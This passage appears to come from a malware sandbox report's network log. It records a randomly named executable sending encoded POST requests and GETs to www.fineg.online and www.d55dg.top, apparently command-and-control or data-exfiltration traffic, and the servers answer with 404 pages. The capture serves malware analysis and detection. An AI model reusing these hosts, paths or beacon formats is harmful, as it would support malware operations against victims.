                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:38.881063938 CEST  302                IN         HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:38 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      8           192.168.2.4  49745        154.23.184.240  80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:46:40.347528934 CEST  449                OUT        GET /ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.d55dg.top
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:41.453099012 CEST  302                IN         HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 3, 2024 12:46:41.453140974 CEST  302                IN         HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      9           192.168.2.4  49750        162.0.239.141   80                1852  C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp                            Bytes transferred  Direction  Data
                      Sep 3, 2024 12:47:00.048372030 CEST  714                OUT        POST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 71 79 38 4f 6b 42 52 35 77 6a 31 34 4f 54 4f 57 57 4b 4d 34 50 76 42 44 73 37 67 68 63 6f 6d 77 68 45 43 6f 4a 39 44 39 30 48 43 57 66 50 41 49 72 2b 64 41 45 6a 6b 4e 64 35 64 64 65 61 4b 44 35 70 43 32 2f 51 42 2b 67 77 42 78 71 61 73 69 39 6b 4d 64 59 71 35 55 47 35 44 32 6b 71 6e 61 76 44 34 6a 57 33 76 6f 67 32 33 72 59 6f 7a 50 35 34 65 50 65 6b 58 35 4d 6f 63 68 6a 4c 43 2f 53 42 4d 49 57 4a 51 78 41 35 6c 32 78 54 47 4f 66 59 4a 36 41 4b 71 44 38 49 33 61 52 74 53 45 75 33 4d 43 48 6c 58 7a 61 58 69 78 63 70 45 38 69 35 2b 45 46 51 3d 3d
                      Data Ascii: TJY8=z8pzi1wICkJUqy8OkBR5wj14OTOWWKM4PvBDs7ghcomwhECoJ9D90HCWfPAIr+dAEjkNd5ddeaKD5pC2/QB+gwBxqasi9kMdYq5UG5D2kqnavD4jW3vog23rYozP54ePekX5MochjLC/SBMIWJQxA5l2xTGOfYJ6AKqD8I3aRtSEu3MCHlXzaXixcpE8i5+EFQ==
                      Sep 3, 2024 12:47:00.593050003 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:00 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:00.593072891 CEST | 224 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                      Sep 3, 2024 12:47:00.593085051 CEST | 1236 | IN | Data Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                      Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                      Sep 3, 2024 12:47:00.593096972 CEST | 1236 | IN | Data Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                      Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                      Sep 3, 2024 12:47:00.593115091 CEST | 1236 | IN | Data Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                      Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                      Sep 3, 2024 12:47:00.593126059 CEST | 1236 | IN | Data Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                      Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                      Sep 3, 2024 12:47:00.593137026 CEST | 1236 | IN | Data Raw: 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73
                      Data Ascii: 25.2h3z"/> <path class="st2" d="M600 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M590 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M580 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M570 282.4h-3l-6.8 25.2h3z"/> <path c
                      Sep 3, 2024 12:47:00.593148947 CEST | 552 | IN | Data Raw: 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20
                      Data Ascii: -3l-6.8 25.2h3z"/> <path class="st2" d="M-330.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-320.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-310.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-300.2 282.4h-3l
                      Sep 3, 2024 12:47:00.593370914 CEST | 1236 | IN | Data Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                      Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                      Sep 3, 2024 12:47:00.593441010 CEST | 1236 | IN | Data Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l
                      Sep 3, 2024 12:47:00.598174095 CEST | 1236 | IN | Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 32 30 20 32
                      Data Ascii: ath class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.4 | 49751 | 162.0.239.141 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:02.671083927 CEST | 734 | OUT | POST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 53 77 76 47 61 6f 49 2f 72 39 7a 48 43 57 4c 66 41 4a 32 75 64 78 45 6a 6f 46 64 34 68 64 65 61 65 44 35 74 4b 32 2f 68 42 35 69 67 42 7a 68 36 73 6b 67 30 4d 64 59 71 35 55 47 36 2b 74 6b 70 58 61 76 54 6f 6a 45 43 54 72 38 6d 33 71 66 6f 7a 50 79 59 65 4c 65 6b 57 65 4d 70 42 70 6a 4a 71 2f 53 42 38 49 58 64 39 6e 56 70 6c 77 31 54 48 70 63 49 34 46 4a 35 58 71 35 5a 48 2f 50 64 43 35 76 78 64 59 57 55 32 6b 49 58 47 43 42 75 4e 49 76 36 44 4e 65 52 48 77 63 35 4f 2b 34 57 69 70 66 49 37 41 2b 76 37 74 42 70 49 3d
                      Data Ascii: TJY8=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaSwvGaoI/r9zHCWLfAJ2udxEjoFd4hdeaeD5tK2/hB5igBzh6skg0MdYq5UG6+tkpXavTojECTr8m3qfozPyYeLekWeMpBpjJq/SB8IXd9nVplw1THpcI4FJ5Xq5ZH/PdC5vxdYWU2kIXGCBuNIv6DNeRHwc5O+4WipfI7A+v7tBpI=
                      Sep 3, 2024 12:47:03.449151993 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 03 Sep 2024 10:47:03 GMT
                      Server: Apache
                      Content-Length: 18121
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                      Sep 3, 2024 12:47:03.449193954 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                      Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                      Sep 3, 2024 12:47:03.449209929 CEST | 448 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                      Sep 3, 2024 12:47:03.449220896 CEST | 1236 | IN | Data Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                      Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                      Sep 3, 2024 12:47:03.449233055 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                      Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:03.449244022 CEST | 448 | IN | Data Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                      Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                      Sep 3, 2024 12:47:03.449258089 CEST | 1236 | IN | Data Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                      Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                      Sep 3, 2024 12:47:03.449278116 CEST | 1236 | IN | Data Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                      Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/> <path class="s
                      Sep 3, 2024 12:47:03.449290037 CEST | 448 | IN | Data Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                      Data Ascii: h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h-3l-6.8 25.2h3z
                      Sep 3, 2024 12:47:03.449302912 CEST | 1236 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                      Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                      Sep 3, 2024 12:47:03.449915886 CEST | 1236 | IN | Data Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                      Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.4 | 49752 | 162.0.239.141 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:05.219326019 CEST | 10816 | OUT | POST /mkan/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.fineg.online
                      Origin: http://www.fineg.online
                      Referer: http://www.fineg.online/mkan/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
